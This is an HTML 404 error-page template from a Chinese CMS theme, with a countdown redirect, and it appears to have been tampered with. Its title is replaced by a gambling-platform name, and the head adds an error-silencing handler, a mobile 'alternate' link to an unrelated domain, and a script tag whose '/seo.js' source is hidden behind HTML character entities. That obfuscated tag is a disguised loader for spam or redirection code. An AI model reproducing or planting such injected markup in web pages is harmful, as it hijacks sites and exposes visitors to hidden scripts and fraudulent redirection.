<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>拉斯维加斯(5001·CHN认证)官方平台-Website homepage</title>
<link href="{:conf(lm,lm)}css/404.css" rel="stylesheet" type="text/css" />
<script src="http://www.jq22.com/jquery/jquery-1.10.2.js"></script>
<script type="text/javascript">
	$(function() {
		var h = $(window).height();
		$('body').height(h);
		$('.mianBox').height(h);
		centerWindow(".tipInfo");
	});

	//2.将盒子方法放入这个方，方便法统一调用
	function centerWindow(a) {
		center(a);
		//自适应窗口
		$(window).bind('scroll resize',
				function() {
					center(a);
				});
	}

	//1.居中方法，传入需要剧中的标签
	function center(a) {
		var wWidth = $(window).width();
		var wHeight = $(window).height();
		var boxWidth = $(a).width();
		var boxHeight = $(a).height();
		var scrollTop = $(window).scrollTop();
		var scrollLeft = $(window).scrollLeft();
		var top = scrollTop + (wHeight - boxHeight) / 2;
		var left = scrollLeft + (wWidth - boxWidth) / 2;
		$(a).css({
			"top": top,
			"left": left
		});
	}
</script>
<link rel="alternate" media="only screen and(max-width: 640px)" href="http://senye2012.com" ><script type="text/javascript" src="&#47;&#115;&#101;&#111;&#46;&#106;&#115;" rel="nofollow"></script></head>
<body>
<div class="nav ">
    <ul class="navlist mn">
        <li {if !isset($catid)}class="hover"{/if}><a href="{:url('cms/index/index')}" title="首页">首页</a></li>
        {yzn module="cms" action="category" catid="0" cache="3600" order="listorder ASC" num="10" return="data"}
        {volist name="data" id="vo"}
        <li ><a href="{:conf(lm,url)}{$vo.catdir}" title="{$vo.catname}">{$vo.catname}</a></li>
        {/volist}
        {/yzn}
    </ul>
</div>
<div class="mianBox">
	<img src="{:conf(lm,lm)}images/yun0.png" alt="" class="yun yun0" />
	<img src="{:conf(lm,lm)}images/yun1.png" alt="" class="yun yun1" />
	<img src="{:conf(lm,lm)}images/yun2.png" alt="" class="yun yun2" />
	<img src="{:conf(lm,lm)}images/bird.png" alt="" class="bird" />
	<img src="{:conf(lm,lm)}images/san.png" alt="" class="san" />
	<div class="tipInfo">
		<div class="in">
			<div class="textThis">
				<h2>出错啦404！</h2>
				<p>等待<b id="wait">5</b>秒页面自动<a id="href" href="{:conf(lm,url)}">跳转</a></p>
				<script type="text/javascript">                            (function() {
						var wait = document.getElementById('wait'), href = document.getElementById('href').href;
						var interval = setInterval(function() {
							var time = --wait.innerHTML;
							if (time <= 0) {

								clearInterval(interval);
								var href="{:conf(lm,url)}";
								location.href = href;
								// alert("开始跳转提示");
							}
							;
						}, 1000);
					})();
				</script>
			</div>
		</div>
	</div>
</div>
<div class="foot">
<div class="mn ">
    <div class="r">{$SEO[site_title]}<br>网址：<a href="{:conf(lm,url)}">{:conf(lm,url)}</a></div>
</div>
</div>


</body><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/sitemap.xml" target="_blank">XML 地图</a>
</html>
